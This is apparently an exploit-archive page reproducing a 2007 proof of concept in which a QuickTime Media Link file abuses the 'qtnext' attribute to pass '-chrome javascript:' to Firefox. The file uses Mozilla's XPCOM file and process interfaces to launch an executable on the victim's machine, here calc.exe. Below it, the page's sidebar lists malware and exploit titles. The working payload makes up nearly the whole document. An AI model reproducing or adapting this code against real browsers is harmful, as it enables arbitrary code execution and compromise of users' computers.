appleqt-exec.txt

Posted on 14 September 2007

<!--
http://www.gnucitizen.org/blog/0day-quicktime-pwns-firefox

It seams that QuickTime media formats can hack into Firefox.
The result of this vulnerability can lead to full compromise of
the browser and maybe even the underlaying operating system.
Don't try this at home.
-->

<?xml version="1.0">
<?quicktime type="application/x-quicktime-media-link"?>
<embed src="a.mp3" autoplay="true" qtnext="-chrome javascript:file=Components.classes['@mozilla.org/file/local;1'].createInstance(Components.interfaces.nsILocalFile);file.initWithPath('c:\windows\system32\calc.exe');process=Components.classes['@mozilla.org/process/util;1'].createInstance(Components.interfaces.nsIProcess);process.init(file);process.run(true,[],0);void(0);"/>

TOP

Malware :

RATDispenser
whispergate
Borat RAT
Trojanized X_Trader
BlackLotus

Last 20

Exploits :

Drupal-Wiki 8.31 / 8.30 Cross Site Scripting
Kortex 1.0 SQL Injection
POMS PHP 1.0 SQL Injection / Shell Upload
iboss Secure Web Gateway Cross Site Scripting
Clinic Queuing System 1.0 Remote Code Execution

Last 20